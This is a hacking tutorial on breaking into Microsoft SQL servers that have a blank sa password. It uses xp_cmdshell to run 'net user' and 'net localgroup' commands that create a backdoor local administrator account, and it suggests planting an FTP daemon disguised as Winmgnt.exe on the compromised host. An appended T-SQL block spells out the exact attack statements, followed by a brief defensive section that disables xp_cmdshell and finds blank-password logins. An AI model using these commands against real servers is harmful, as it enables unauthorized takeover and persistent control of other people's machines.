Hacking SQL, The Ntpass

This document describes how to hack into a SQL server to gain administrator access on the remote machine. It involves using tools like psexec and sqlexec to add a new user account and elevate its privileges to administrator on the target system by exploiting the xp_cmdshell stored procedure to execute commands like 'net user' and 'net localgroup'. The goal is to establish a way to remotely access and control the hacked server.

Hacking SQL, the NTPASS way

Needed filez        Description..

Winmgnt.exe         FTP server daemon
servudaemon.ini     settings for the FTP server
psexec              program for executing files remotely
                    (get it here: http://www.sysinternals.com/files/psexec.zip)
serv-u              install this program locally, to administer your hacked stros...
explorer.exe        should already be on your wind0ze client
tlist.exe           shows the process list on the remote machine (with PID)
kill.exe            kills processes on the remote machine, in the format "kill <pID>"
SQLExec             gives you the power to get admin
--------------------------------------------------------------------------------
For this one you need a SQL scan...
You will of course need an MSSQL server with a weak password (here: a blank sa
password) and some nice stored procedures still available, like xp_cmdshell:

IP    192.168.1.1
User  sa
Pass  (blank)

This SQL server has a nice feature. Remember that on these installs the MSSQL
service runs as LocalSystem or another administrative account on the computer,
so whatever you run through xp_cmdshell inherits those rights. That gives you
some nice possibilities, unlike IIS, where your requests run as the
low-privileged anonymous web user.
Do you know the very user-friendly (read: hacker-friendly) net.exe? We're going
to use it through xp_cmdshell.
I suppose you're at least a little familiar with SQLexec; if not, read my SQL
hacking guide first...
1) Go to the command line input textbox in sqlexec (every line you type there
   is handed to xp_cmdshell and runs on the server).
   Type "net user [username] [password] /ADD", like this:
   net user pizzaking ev1lp4ss /ADD
   The account now exists, but only as an ordinary member of the local Users
   group (not as a guest).
   Since being an ordinary user isn't much fun, you'd better do this too:
   "net localgroup [name of the administrators group] [username] /ADD", like this:
   net localgroup administrators pizzaking /ADD
   (The group name is localized on non-English installs, hence the placeholder;
   "net localgroup" on its own lists the groups if you are unsure.)
2) Start -> Run "\\192.168.1.1"
   The server now asks for a username and a matching password. Enter the
   account you just created (in this example "pizzaking" as the username and
   "ev1lp4ss" as the password)...
   And now: go read the NTPASS hacking guide (it's really kinda the same stuff
   from here on).
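
The exact statements behind steps 1 and 2, as an added example that is not
part of the original guide. It assumes the target from the scan above
(192.168.1.1, sa, blank password) and a client that passes raw T-SQL; sqlexec
wraps what you type in xp_cmdshell for you, so this is what it sends. The
defender's half at the end (sp_configure, PWDCOMPARE) applies to SQL Server
2005 and later and is added context, not something the guide covers.

```sql
-- Added example, not from the original text. Assumes the client is connected
-- as sa (blank password) to 192.168.1.1 and that xp_cmdshell is present in
-- master (enabled by default on SQL Server 7.0/2000, which this guide targets).
USE master;
GO

-- Step 1: create the local account. net.exe's output comes back as the result
-- set, one row per line, so a failure (e.g. password rejected by the local
-- policy) is visible immediately.
EXEC master..xp_cmdshell 'net user pizzaking ev1lp4ss /ADD';
GO

-- A fresh "net user /ADD" account is only a member of the local Users group,
-- so put it in the administrators group. The group name is localized on
-- non-English installs; list the groups with 'net localgroup' if unsure.
EXEC master..xp_cmdshell 'net localgroup administrators pizzaking /ADD';
GO

-- Check before trying the \\192.168.1.1 share in step 2: the new name must
-- show up under "Local Group Memberships" with *Administrators.
EXEC master..xp_cmdshell 'net user pizzaking';
GO

-- Defender's side of the same finding (SQL Server 2005 and later, where
-- xp_cmdshell is off by default): show the current value, then force it off
-- in case someone re-enabled it.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';          -- config_value / run_value should be 0
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
GO

-- The blank-password check the scan in this guide relies on (SQL Server 2005
-- and later): PWDCOMPARE tests a candidate password against the stored hash.
SELECT name
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;
GO
```

Every xp_cmdshell call runs in the security context of the SQL Server service
account, which is why an unprivileged-looking database login ends up creating
local administrators; the sp_configure block does nothing on 7.0/2000, where
the usual fix was to drop or restrict the extended procedure itself.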
